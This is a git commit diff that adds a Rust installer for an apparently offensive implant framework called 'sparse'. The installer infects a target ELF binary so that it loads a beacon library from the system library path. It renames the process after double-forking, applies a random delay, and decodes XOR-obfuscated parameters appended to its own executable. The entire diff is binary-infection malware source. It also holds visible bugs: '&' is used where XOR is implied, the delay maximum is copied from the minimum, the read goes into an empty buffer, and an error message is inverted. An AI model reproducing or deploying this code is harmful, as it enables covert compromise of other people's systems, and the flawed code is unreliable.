feat: fixed server comp, added ELF inject

I gave up and just put it in a Docker image, it's not as important as the beacons being statically compiled
2025-02-04 16:41:20 -05:00
parent 00331ec550
commit 90c8b97141
53 changed files with 1477 additions and 94 deletions
--- a/sparse-unix-installer/src/main.rs
+++ b/sparse-unix-installer/src/main.rs
@@ -1,3 +1,77 @@
-fn main() {
-    println!("Hello, world!");
+use std::{
+    fs::OpenOptions,
+    io::{prelude::*, Error, SeekFrom},
+    path::PathBuf,
+};
+
+use rand::{rngs::OsRng, TryRngCore};
+use structopt::StructOpt;
+
+use sparse_actions::payload_types::{Parameters, XOR_KEY};
+use sparse_unix_infector::infect_elf_binary;
+
+#[derive(StructOpt, Debug)]
+#[structopt(name = "sparse-installer")]
+struct Options {
+    /// Path to binary to infect
+    #[structopt(short, long)]
+    binary: PathBuf,
+
+    /// Path for where to store the library that sparse uses;
+    /// must be somewhere in the library search path (e.g., /lib/x86_64-linux-gnu)
+    #[structopt(short, long)]
+    library_path: PathBuf,
+
+    /// Name to call the program after it double forks
+    #[structopt(short = "n", long)]
+    binary_name: String,
+
+    /// How long to randomly wait (minimum) after being loaded before causing tomfoolery
+    #[structopt(long, default_value = "0")]
+    delay_seconds_minimum: u8,
+
+    /// How long to randomly wait (maximum) after being loaded before causing tomfoolery
+    #[structopt(long, default_value = "0")]
+    delay_seconds_maximum: u8,
+}
+
+fn main() -> Result<(), Error> {
+    let opts = Options::from_args();
+
+    if opts.delay_seconds_minimum > opts.delay_seconds_maximum {
+        eprintln!("Delay seconds minimum should be larger than delay seconds maximum!");
+        panic!();
+    }
+
+    let mut installer_file = OpenOptions::new()
+        .read(true)
+        .open(std::env::current_exe()?)?;
+
+    let parameters_size = std::mem::size_of::<Parameters>() as i64;
+
+    installer_file.seek(SeekFrom::End(-parameters_size))?;
+
+    let mut parameters_buffer = Vec::with_capacity(parameters_size as usize);
+    installer_file.read(&mut parameters_buffer)?;
+
+    for b in parameters_buffer.iter_mut() {
+        *b = *b & (XOR_KEY as u8);
+    }
+
+    let parameters: &mut Parameters =
+        unsafe { std::mem::transmute(parameters_buffer.as_mut_ptr()) };
+
+    let mut identifier = [0u8; 32];
+    OsRng
+        .try_fill_bytes(&mut identifier)
+        .expect("Could not generate beacon identifier");
+
+    let beacon_name = opts.binary_name.as_bytes();
+    parameters.beacon_name[..beacon_name.len()].copy_from_slice(&beacon_name[..]);
+    parameters.beacon_name_length = beacon_name.len() as u16;
+
+    parameters.delay_seconds_min = opts.delay_seconds_minimum;
+    parameters.delay_seconds_max = opts.delay_seconds_minimum;
+
+    infect_elf_binary(opts.binary, opts.library_path, parameters)
 }